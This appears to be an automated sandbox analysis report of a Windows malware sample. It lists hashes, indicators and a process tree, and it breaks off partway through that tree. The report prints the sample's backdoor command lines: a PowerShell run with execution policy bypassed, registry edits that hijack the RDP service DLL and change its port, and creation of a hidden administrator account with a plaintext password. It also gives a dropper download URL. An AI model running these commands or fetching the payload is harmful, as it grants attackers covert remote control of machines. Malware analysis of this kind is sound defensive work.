9d2a3042c4e2d68df7a39cd7efae7c64f2b7ed5ae507bac9282e154591757724

Analysis

max time kernel
48s
max time network
125s
platform
windows10_x64
resource
win10v20210410
submitted
16-06-2021 10:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6efc7601be401f3e9b49f4f2cf63fee9.exe
Size

6.0MB
MD5

6efc7601be401f3e9b49f4f2cf63fee9
SHA1

6c975b9f64a3e0840c43f11571bc4b1bccdc3d83
SHA256

9d2a3042c4e2d68df7a39cd7efae7c64f2b7ed5ae507bac9282e154591757724
SHA512

87998010dd888280388f65637945aca1c641c45ad482d9abb193b1f00c5838aff22dcec68c695feb357dab26f536edd8364640cda4814de461c506b1ff288c7a

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
13	1252	powershell.exe
15	1252	powershell.exe
16	1252	powershell.exe
17	1252	powershell.exe
19	1252	powershell.exe
21	1252	powershell.exe
23	1252	powershell.exe
25	1252	powershell.exe
27	1252	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

3488
3488

pid	process
3488
3488

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA473.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA4C3.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA504.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jgcka5tz.dwz.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1d3043kd.q33.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA493.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA4F3.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exeWMIC.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2104 reg.exe
Runs net.exe

pid	process
2104	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	17	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2808	powershell.exe
2808	powershell.exe
2808	powershell.exe
1156	powershell.exe
1156	powershell.exe
1156	powershell.exe
1832	powershell.exe
1832	powershell.exe
1832	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
2808	powershell.exe
2808	powershell.exe
2808	powershell.exe
1252	powershell.exe
1252	powershell.exe
1252	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

612
612

pid	process
612
612

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2808	powershell.exe
Token: SeDebugPrivilege	1156	powershell.exe
Token: SeIncreaseQuotaPrivilege	1156	powershell.exe
Token: SeSecurityPrivilege	1156	powershell.exe
Token: SeTakeOwnershipPrivilege	1156	powershell.exe
Token: SeLoadDriverPrivilege	1156	powershell.exe
Token: SeSystemProfilePrivilege	1156	powershell.exe
Token: SeSystemtimePrivilege	1156	powershell.exe
Token: SeProfSingleProcessPrivilege	1156	powershell.exe
Token: SeIncBasePriorityPrivilege	1156	powershell.exe
Token: SeCreatePagefilePrivilege	1156	powershell.exe
Token: SeBackupPrivilege	1156	powershell.exe
Token: SeRestorePrivilege	1156	powershell.exe
Token: SeShutdownPrivilege	1156	powershell.exe
Token: SeDebugPrivilege	1156	powershell.exe
Token: SeSystemEnvironmentPrivilege	1156	powershell.exe
Token: SeRemoteShutdownPrivilege	1156	powershell.exe
Token: SeUndockPrivilege	1156	powershell.exe
Token: SeManageVolumePrivilege	1156	powershell.exe
Token: 33	1156	powershell.exe
Token: 34	1156	powershell.exe
Token: 35	1156	powershell.exe
Token: 36	1156	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeIncreaseQuotaPrivilege	1832	powershell.exe
Token: SeSecurityPrivilege	1832	powershell.exe
Token: SeTakeOwnershipPrivilege	1832	powershell.exe
Token: SeLoadDriverPrivilege	1832	powershell.exe
Token: SeSystemProfilePrivilege	1832	powershell.exe
Token: SeSystemtimePrivilege	1832	powershell.exe
Token: SeProfSingleProcessPrivilege	1832	powershell.exe
Token: SeIncBasePriorityPrivilege	1832	powershell.exe
Token: SeCreatePagefilePrivilege	1832	powershell.exe
Token: SeBackupPrivilege	1832	powershell.exe
Token: SeRestorePrivilege	1832	powershell.exe
Token: SeShutdownPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeSystemEnvironmentPrivilege	1832	powershell.exe
Token: SeRemoteShutdownPrivilege	1832	powershell.exe
Token: SeUndockPrivilege	1832	powershell.exe
Token: SeManageVolumePrivilege	1832	powershell.exe
Token: 33	1832	powershell.exe
Token: 34	1832	powershell.exe
Token: 35	1832	powershell.exe
Token: 36	1832	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeIncreaseQuotaPrivilege	3024	powershell.exe
Token: SeSecurityPrivilege	3024	powershell.exe
Token: SeTakeOwnershipPrivilege	3024	powershell.exe
Token: SeLoadDriverPrivilege	3024	powershell.exe
Token: SeSystemProfilePrivilege	3024	powershell.exe
Token: SeSystemtimePrivilege	3024	powershell.exe
Token: SeProfSingleProcessPrivilege	3024	powershell.exe
Token: SeIncBasePriorityPrivilege	3024	powershell.exe
Token: SeCreatePagefilePrivilege	3024	powershell.exe
Token: SeBackupPrivilege	3024	powershell.exe
Token: SeRestorePrivilege	3024	powershell.exe
Token: SeShutdownPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeSystemEnvironmentPrivilege	3024	powershell.exe
Token: SeRemoteShutdownPrivilege	3024	powershell.exe
Token: SeUndockPrivilege	3024	powershell.exe
Token: SeManageVolumePrivilege	3024	powershell.exe
Token: 33	3024	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6efc7601be401f3e9b49f4f2cf63fee9.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 3896 wrote to memory of 2808	3896	6efc7601be401f3e9b49f4f2cf63fee9.exe	powershell.exe
PID 3896 wrote to memory of 2808	3896	6efc7601be401f3e9b49f4f2cf63fee9.exe	powershell.exe
PID 2808 wrote to memory of 4068	2808	powershell.exe	csc.exe
PID 2808 wrote to memory of 4068	2808	powershell.exe	csc.exe
PID 4068 wrote to memory of 2284	4068	csc.exe	cvtres.exe
PID 4068 wrote to memory of 2284	4068	csc.exe	cvtres.exe
PID 2808 wrote to memory of 1156	2808	powershell.exe	powershell.exe
PID 2808 wrote to memory of 1156	2808	powershell.exe	powershell.exe
PID 2808 wrote to memory of 1832	2808	powershell.exe	powershell.exe
PID 2808 wrote to memory of 1832	2808	powershell.exe	powershell.exe
PID 2808 wrote to memory of 3024	2808	powershell.exe	powershell.exe
PID 2808 wrote to memory of 3024	2808	powershell.exe	powershell.exe
PID 2808 wrote to memory of 3900	2808	powershell.exe	reg.exe
PID 2808 wrote to memory of 3900	2808	powershell.exe	reg.exe
PID 2808 wrote to memory of 2104	2808	powershell.exe	reg.exe
PID 2808 wrote to memory of 2104	2808	powershell.exe	reg.exe
PID 2808 wrote to memory of 1916	2808	powershell.exe	reg.exe
PID 2808 wrote to memory of 1916	2808	powershell.exe	reg.exe
PID 2808 wrote to memory of 2084	2808	powershell.exe	net.exe
PID 2808 wrote to memory of 2084	2808	powershell.exe	net.exe
PID 2084 wrote to memory of 2724	2084	net.exe	net1.exe
PID 2084 wrote to memory of 2724	2084	net.exe	net1.exe
PID 2808 wrote to memory of 2284	2808	powershell.exe	cmd.exe
PID 2808 wrote to memory of 2284	2808	powershell.exe	cmd.exe
PID 2284 wrote to memory of 3796	2284	cmd.exe	cmd.exe
PID 2284 wrote to memory of 3796	2284	cmd.exe	cmd.exe
PID 3796 wrote to memory of 2664	3796	cmd.exe	net.exe
PID 3796 wrote to memory of 2664	3796	cmd.exe	net.exe
PID 2664 wrote to memory of 2088	2664	net.exe	net1.exe
PID 2664 wrote to memory of 2088	2664	net.exe	net1.exe
PID 2808 wrote to memory of 2352	2808	powershell.exe	cmd.exe
PID 2808 wrote to memory of 2352	2808	powershell.exe	cmd.exe
PID 2352 wrote to memory of 4052	2352	cmd.exe	cmd.exe
PID 2352 wrote to memory of 4052	2352	cmd.exe	cmd.exe
PID 4052 wrote to memory of 3924	4052	cmd.exe	net.exe
PID 4052 wrote to memory of 3924	4052	cmd.exe	net.exe
PID 3924 wrote to memory of 1832	3924	net.exe	net1.exe
PID 3924 wrote to memory of 1832	3924	net.exe	net1.exe
PID 2124 wrote to memory of 2104	2124	cmd.exe	net.exe
PID 2124 wrote to memory of 2104	2124	cmd.exe	net.exe
PID 2104 wrote to memory of 4040	2104	net.exe	net1.exe
PID 2104 wrote to memory of 4040	2104	net.exe	net1.exe
PID 1804 wrote to memory of 3872	1804	cmd.exe	net.exe
PID 1804 wrote to memory of 3872	1804	cmd.exe	net.exe
PID 3872 wrote to memory of 2144	3872	net.exe	net1.exe
PID 3872 wrote to memory of 2144	3872	net.exe	net1.exe
PID 3644 wrote to memory of 3908	3644	cmd.exe	net.exe
PID 3644 wrote to memory of 3908	3644	cmd.exe	net.exe
PID 3908 wrote to memory of 2388	3908	net.exe	net1.exe
PID 3908 wrote to memory of 2388	3908	net.exe	net1.exe
PID 1516 wrote to memory of 2804	1516	cmd.exe	net.exe
PID 1516 wrote to memory of 2804	1516	cmd.exe	net.exe
PID 2804 wrote to memory of 2104	2804	net.exe	net1.exe
PID 2804 wrote to memory of 2104	2804	net.exe	net1.exe
PID 4040 wrote to memory of 1240	4040	cmd.exe	net.exe
PID 4040 wrote to memory of 1240	4040	cmd.exe	net.exe
PID 1240 wrote to memory of 3808	1240	net.exe	net1.exe
PID 1240 wrote to memory of 3808	1240	net.exe	net1.exe
PID 2144 wrote to memory of 188	2144	cmd.exe	net.exe
PID 2144 wrote to memory of 188	2144	cmd.exe	net.exe
PID 188 wrote to memory of 2664	188	net.exe	net1.exe
PID 188 wrote to memory of 2664	188	net.exe	net1.exe
PID 3004 wrote to memory of 2064	3004	cmd.exe	WMIC.exe
PID 3004 wrote to memory of 2064	3004	cmd.exe	WMIC.exe

C:\Users\Admin\AppData\Local\Temp\6efc7601be401f3e9b49f4f2cf63fee9.exe
"C:\Users\Admin\AppData\Local\Temp\6efc7601be401f3e9b49f4f2cf63fee9.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2808

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:4068

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D27.tmp" "c:\Users\Admin\AppData\Local\Temp\kuijob3s\CSC4856BA9160684051B4EC1A7082BC632F.TMP"
4⤵
PID:2284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:3900

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies registry key
PID:2104

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:1916

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:2084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:2724

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:2284

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:3796

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:2664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:2088

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:2352

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:3924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:1832

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:2180

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:2528

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2124

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:2104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
3⤵
PID:4040

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc IUni1mTF /add
1⤵
- Suspicious use of WriteProcessMemory
PID:1804

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc IUni1mTF /add
2⤵
- Suspicious use of WriteProcessMemory
PID:3872

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc IUni1mTF /add
3⤵
PID:2144

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3644

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:2388

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1516

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:2804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
3⤵
PID:2104

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4040

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:1240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
